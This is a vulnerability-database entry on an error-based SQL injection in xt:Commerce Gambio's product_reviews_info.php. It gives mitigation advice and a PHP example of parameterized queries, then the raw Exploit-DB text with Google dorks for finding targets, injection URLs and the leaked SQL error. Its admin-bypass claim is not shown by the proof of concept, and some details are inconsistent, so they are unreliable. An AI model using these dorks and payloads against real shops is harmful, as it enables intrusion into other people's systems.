Vendor: xt:Commerce
By: secret
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: xt:Commerce
Affected Version From: 2006
Affected Version To: 2010
Patch Exists: NO
Related CWE: N/A
CPE: a:gambio:xt:commerce
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux
Year: 2010

xt:Commerce Gambio 2008 – 2010 ERROR Based SQL Injection ‘reviews.php’

xt:Commerce Gambio 2008 - 2010 is vulnerable to error-based SQL injection. The 'product_reviews_info.php' script takes the 'products_id' parameter and uses it in an SQL query without proper sanitization, so arbitrary SQL can be injected into that query. This can be used to bypass authentication and gain access to the admin panel.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct SQL queries in an unsafe manner. Parameterized queries should be used to prevent SQL injection attacks.
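As an added illustration of this mitigation (not code from xt:Commerce or Gambio), the lookup below reconstructs the query shape from the error message quoted in the advisory and shows it in a vulnerable and a hardened form; the function names and the in-memory SQLite fixture are assumptions made for the example.

```php
<?php
// Added example, not xt:Commerce/Gambio code. The query text comes from the error
// message in the advisory; the function names and the SQLite fixture are assumptions.

// Vulnerable shape: products_id is pasted into the SQL string, and the database error
// (including the query) is rendered to the page, which is what makes the bug error-based.
function manufacturerIdUnsafe(PDO $db, string $productsId): ?int
{
    $sql = "select manufacturers_id from products where products_id = $productsId";
    try {
        $row = $db->query($sql)->fetch(PDO::FETCH_ASSOC);
    } catch (PDOException $e) {
        // Mirrors xtc_db_error(): query text and driver error go into the response body.
        echo 'xtc_db_error ("' . $sql . '", "' . $e->getMessage() . '")' . PHP_EOL;
        return null;
    }
    return $row ? (int) $row['manufacturers_id'] : null;
}

// Hardened shape: validate the parameter as a plain integer, bind it as a query
// parameter, and keep driver errors out of the response.
function manufacturerIdSafe(PDO $db, string $productsId): ?int
{
    if (!preg_match('/^[0-9]+$/', $productsId)) {
        return null; // rejected before any SQL is built
    }
    $stmt = $db->prepare('SELECT manufacturers_id FROM products WHERE products_id = :id');
    $stmt->bindValue(':id', (int) $productsId, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row ? (int) $row['manufacturers_id'] : null;
}

// Constructed in-memory fixture so the example runs offline (needs the pdo_sqlite extension).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE products (products_id INTEGER PRIMARY KEY, manufacturers_id INTEGER)');
$db->exec('INSERT INTO products (products_id, manufacturers_id) VALUES (4, 7)');

var_dump(manufacturerIdSafe($db, '4'));     // well-formed id: normal lookup
var_dump(manufacturerIdSafe($db, "4'"));    // malformed id: rejected, no query is run
var_dump(manufacturerIdUnsafe($db, "4'"));  // malformed id reaches the engine and the error is echoed
```

Rejecting non-numeric ids before any SQL is built and binding the value each remove the injection on their own; suppressing the driver's error message additionally closes the error-based channel for any query that is missed.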
Source

Exploit-DB raw data:


# Exploit Title: xt:Commerce Gambio 2008 - 2010 ERROR Based SQL Injection "reviews.php"
# Date: 2010-09-18
# Author: secret
# Contact : secret_hf@hotmail.com / ICQ : 17-33-77
# Site : swissfaking.net/board
# Software Link: http://www.gambio.de/
# Version: 2006 - 2008 - 2010 - all versions
# Tested on: XP / Linux

# Fixed? : NOT FIXED

# Dorks : Gambio inurl:"reviews.php" / Gambio inurl:"product_reviews.php?products_id=" etc...

##############################################################################################

[ERROR BASED SQL INJECTION]

http://www.xxxxx.com/product_reviews_info.php?products_id=x[SQL INJECTION]

e.g. http://server/product_reviews_info.php?products_id=4[ERROR BASED SQL INJECTION]
e.g. http://server/product_reviews_info.php?products_id=4'

->   xtc_db_error ("select manufacturers_id from products where products_id = 4/'", "1064

##############################################################################################

[THANKS TO]

ALLAH - there is no god but God

To all my brothers & sisters in IRAN - god bless you - support the GREEN REVOLUTION